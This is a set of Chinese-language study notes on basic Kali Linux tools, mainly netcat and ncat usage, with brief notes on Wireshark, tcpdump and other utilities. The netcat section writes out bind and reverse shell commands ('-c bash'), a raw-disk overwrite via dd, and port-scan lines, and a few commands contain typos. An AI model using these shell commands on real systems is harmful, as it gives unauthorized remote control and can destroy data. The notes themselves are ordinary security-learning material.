Kali基本工具学习

netcat–nc

• 侦听模式/传输模式
• telnet/获取banner信息
• 传输文本信息
• 传输文件/目录
• 加密传输文件
• 远程控制/木马
• 加密所有流量
• 流媒体服务器
• 远程克隆硬盘

telnet 远程登录
banner信息 横幅广告,用于表明端口的身份,显示欢迎信息
nc -nv ip 端口

传输文本信息
A:nc -l -p 4444 -l 侦听,-p 指定端口
B:nc -nv 1.1.1.1 4444
可用于远程电子取证信息收集

传输文件
A:nc -lp 333 > 1.mp4 侦听333端口,将侦听到的内容输出到1.mp4
B:nc -nv 1.1.1.1 333 <1.mp4 -q 1 连接333端口,传入1.mp4,-q 1传递完后1s自动退出

A:nc -lp 333 B:nc -nv 1.1.1.1 333 >2.mp4

传输目录
A:tar -cvf - music/ | nc -lp 333 -q 1将目录打包成一个文件,再传输
B: nc -nv 1.1.1.1 333 | tar -xvf –接收文件,解包

加密传输文件
A:nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb >1.mp4
B:mcrypt –flush -Fbq -a rijndael-256 -m ecb

远程控制
A:nc -lp 333 -c bash
B:nc 1.1.1. 333

A:nc -lp 333
B:1.1.1.1 333 -c bash
注:windows用户把bash改成cmd

流媒体服务器
A:cat 1.mp4 | nc -lp 333
B:1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

远程克隆硬盘
A:nc -lp 333 | dd of=/dev/sda
B:DD if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

端口扫描
nc -nvz 1.1.1.1 1-65535-z扫描模式(默认只扫描tcp的端口)
nc -vnzu 1.1.1.1 1-1024-u(扫描udp的端口)

nc的缺陷
缺乏加密和身份验证的能力

ncat

包含于nmap工具包中
A: ncat -c bash –allow 192.168.20.14 -vnl 333 –ssl
B:ncat -nv 1.1.1.1 333 –ssl
nc在不同系统/平台的版本可能不同,参数有变化

Wireshark

抓包工具
选择抓包网卡 个人电脑通常会有一个以太网网卡和无线网网卡,服务器可能有多个网卡
混杂模式 会抓取所有经过网卡的数据包
实时抓包
保存和分析捕获文件
抓包筛选器
显示筛选器

常见协议包
数据包的分层结构
Arp,lcmp,UDP,dns,
http/https
ftp
TCP(三次握手)
数据流

信息统计:
节点数、协议分布、包大小分布、会话连接、解码方式、专家系统

抓包对比nc、ncat加密与不加密的流量

企业抓包部署方案(全流量抓包):Sniffer、Cace/riverbed

Tcpdump

No-GUI的抓包分析工具
Linux、Unix系统默认安装
默认只抓68个字节
tcpdump -i eth0 -s 0 -w file.pcap
Tcpdump -i eth0 part 22
筛选,高级筛选

Dradis

短期临时小团队资源共享
各种插件导入文件

Keepnote 文档记录软件

Truecrypt文件加密工具

windows、linux都有

你可能感兴趣的:(Kali基本工具学习)